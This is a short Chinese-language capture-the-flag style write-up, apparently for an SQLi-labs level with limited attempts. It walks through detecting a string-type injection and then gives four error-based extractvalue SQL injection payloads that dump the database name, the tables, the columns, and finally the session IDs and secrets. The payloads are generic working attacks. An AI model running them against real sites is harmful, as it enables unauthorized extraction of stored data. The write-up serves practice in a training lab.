这一关的欢迎界面提示我们尝试机会为5次 然后要以id为注入点
首先先判断一下是否为数字型 输入id=1 and 1=2 回显如下 所以属于字符型
然后输入1' 回显如下 出现了报错信息 说明可以进行报错注入 也说明了注入类型
佐证一下 输入一个1'))--+回显如下
这道题我还是使用报错注入 首先爆库 输入如下
id=0')) and extractvalue(1,concat(0x7e,(database()),0x7e))--+
数据库每一轮都是一样的 所以可以提前获悉 但是其他的东西得等到下一轮在进行爆破 我们先把这一轮浪费掉
我们在新的一轮再重新检验一下此时的数据库是否是上一轮检验的那样 回显如下 没错
接着进行爆表操作 输入如下
id=0')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
回显如下
接着进行爆字段操作 输入如下
id=0')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='o1tdjzlei0'),0x7e))--+
回显如下
最后进行爆用户名和密码操作 输入如下
id=0')) and extractvalue(1,concat(0x7e,(select group_concat(sessid,'-',secret_C23H) from o1tdjzlei0),0x7e))--+
回显如下
这一关又通过了 嗨嗨!!